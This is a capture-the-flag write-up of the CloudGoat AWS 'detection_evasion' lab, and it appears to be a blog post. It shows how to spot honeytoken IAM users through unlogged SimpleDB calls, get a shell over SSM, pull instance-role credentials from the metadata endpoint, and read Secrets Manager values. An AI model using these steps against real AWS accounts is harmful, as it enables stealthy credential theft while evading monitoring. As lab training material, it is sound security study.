Cloudgoat AWS CTF solution- Scenerio 11 (detection_evasion)

Scenerio 11- detection_evasion

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create detection_evasion

Scenario Resources (High Level)

4 IAM Users

2 EC2 instances

2 SecretsManager secrets

A suite of detection mechanisms

Scenario Start(s)

4 pairs of IAM Credentials.

Scenario Goal(s)

The goal of this scenario is to read out the values for both secrets without being detected. The secrets are both stored in Secrets Manager, and their values have the following format (cg-secret-XXXXXX-XXXXXX).

Summary (TLDR setup below)

This scenario is significantly different from the CloudGoat scenarios that have come before in how it plays. In detection_evasion, your goals will be outlined for you more clearly, and the challenge is to complete them without triggering alarms. There is more setup involved in this scenario, and it will take longer to play (you might want/need to play it multiple times).

For starters, you will need to provide an email address to which cloudgoat can send email alerts. When/If you are detected by the automated mechanisms, an alert will be sent to this email address. If you don’t want to use your standard email address, you can consider a service such as https://temp-mail.org/ or https://www.fakemail.net/.

After deployment is complete, you will need to wait about an hour before playing the scenario. This is, unfortunately, necessary for the cloudwatch alerts to fully integrate with cloudtrails logs. It should also be kept in mind that there can be a significant delay in alerts for actions that you take (10–15 minutes is not uncommon). So check your email periodically to see if you have triggered an alert.

TLDR Setup

1. Set up a temporary email address if desired.
2. Deploy the cloudgoat scenario. You will need to enter your email when prompted, and it will subsequently be stored in the ‘config.yml’ file at the top level of the repo.
3. Check your email address for SNS confirmation emails; there should be two. Confirm that you want to subscribe to the topics.
4. Wait 30–60 minutes before working on the scenario. This is necessary because there is some lag between the time that terraform finishes deploying all resources and the time that your CLI actions will actually trigger the alerts that result in email notifications.

SPOILER ALERT: There are spoilers for the scenario below this point.

Exploitation Route

Walkthrough Overview — Easy Path

1. Discovering honey users-

We have been provided with 4 credentials. For detecting honey users we can guess by reading the full name of the iam resource(ARN). This can be fetched by doing any valid api call if we don’t have permission(Honey users usually don’t have) we will get an error in return showing the ARN. But there is a catch there can be monitoring(CloudTrail) already in place for these api calls. So we we need to use something which is not monitored by CloudTrail. “aws adb” api calls are not monitored by cloudtrail :) Therefore we will be using these-

a. Checking user_1 -

aws --profile user_1 sdb list-domains --region us-east-1

The above command reveals that user1 is “user/canarytokens.com@@kz9r8ouqnhve4zs1yi4bzspzz”. These tokens are generated by a third-party honeytoken service “canarytokens.com”.

We can also use pacu’s module(“iam__detect_honeytokens”) for detecting this. In my case PACU this module generated email alerts when used-

Therefore this is a honey user :(

b. Checking user_2 -

Similarly, for user2 we found a unique identifier “spacecrab”. A quick google search revealed that this is also a Deception tool.

aws --profile user_2 sdb list-domains --region us-east-1

Therefore this is a honey user :(

c. Checking user_3 -

This user is tricky Pacu is unable to identify this as a honey user. But if we look at the user name. It looks like a uuid (randomly generated unique string) which shows this user is also automatically generated. UUID format also matches to that of spacesiren

aws --profile user_3 sdb list-domains --region us-east-1

Therefore this is a honey user :(

c. Checking user_4 -

aws --profile cg4 --region us-east-1 sdb list-domains

The above command reveals that user4 has permissions to the sdb service, and is therefore likely a legitimate user.

“arn:aws:iam::623845349649:user/r_waterhouse”

2. Enumerating user permissions-

a. Upon using enumerate-iam in this case, We got a huge list of allowed APIs. I skipped going through its results.

b. Checking if our user is part of any group, If yes what are the policies attached-

i. Checking group-

cg-developers

aws --profile user_4 iam list-groups-for-user --user-name r_waterhouse

ii. Listing inline policies for group “cg-developers”-

aws --profile user_4 iam list-group-policies --group-name cg-developers

iii. Getting permissions for “developer_policy” inline group policy-

aws --profile user_4 iam get-group-policy --group-name cg-developers --policy-name developer_policy

We can see that we have ssm permissions to ec2 instances.

3. Listing ec2 instances-

aws --profile user_4 --region us-east-1 ec2 describe-instances

We found 2 ec2 instances- i-0e8c0209f9f189841 and i-0b90cd487675a2818(54.152.116.179)

Only one of them has public IP assigned. So we will try to get the shell of instance “i-0b90cd487675a2818”.

4. Getting shell via ssm-

aws --profile user_4 --region us-east-1  ssm start-session --target "i-0b90cd487675a2818"

5. Getting ec2 role’s credentials-

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/detection_evasion_cgid2wolmzzgua_easy

6. Enumerating permissions for ec2 role-

enumerate-iam

We have permission to list secrets from the secrets manager.

7. Listing and reading secrets-

a. Listing secrets-

aws --region us-east-1  secretsmanager list-secrets --profile ec2_role

“arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_hard_secret-u9Nc7c”

“arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8”

b. Reading secrets-

We were able to read only one secret.

aws --profile ec2_role --region us-east-1  secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8"

cg-secret-889877–282341

References-

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/detection_evasion/README.md

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/detection_evasion/cheat_sheet.md